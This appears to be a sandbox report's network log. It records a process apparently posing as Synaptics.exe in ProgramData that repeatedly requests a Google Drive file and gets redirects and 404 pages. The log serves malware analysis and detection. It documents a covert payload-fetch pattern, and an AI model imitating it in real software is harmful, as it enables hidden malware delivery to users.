                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:53 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:52 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-kVq5zSizLjOxxIDjoEMgpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      50192.168.2.649920142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:52 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:53 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4oY-GARncQEDZ0cQsqEoc_K2TW44oOfLJAeJQFdJUUUMNON3kQKfblRU08_YkDXavKap0qP64
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:53 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-VsqyH0TSWQkn3H0OQGuqlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:53 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:53 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 73 6e 71 54 2d 54 75 63 65 5a 30 6f 65 4f 53 72 32 4a 4d 5a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="asnqT-TuceZ0oeOSr2JMZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:53 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      51192.168.2.649926142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:53 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      52192.168.2.649928142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:53 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      53192.168.2.649929142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:53 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      54192.168.2.649930142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:53 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      55192.168.2.649936142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:54 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:54 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-fhaVjna-dPJg6YR8mI7x4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      56192.168.2.649935142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:54 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:54 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ZmfhtEEWQMD3_bhqPFTxGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      57192.168.2.649944142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:55 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:55 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4aTYrtBO3tIK5UUqTTSEIdd_UNmZ-azqQVolpSNPrzBheJjWsiy_n6qxMbkH-0F-hf
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:55 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ftZtmqNplQUJXpFMnoCf1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:55 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:55 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 51 35 59 4c 41 68 34 4d 73 2d 33 4a 47 54 61 42 54 42 39 4f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="TQ5YLAh4Ms-3JGTaBTB9Ow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:55 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      58192.168.2.649943142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:55 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:55 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-lV1bhbGSJpeSRYhVm6jc4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      59192.168.2.649946142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:55 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:55 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2iwIFHP1zoMStDRsI4PsMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      60192.168.2.649945142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:55 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:55 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6sXiif5GL6JjzU04Yp6gARQa5-yIxMq3l4odgVdA9uNTxAL52wtHHDyjd7Odi89lVBhmj_9XI
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
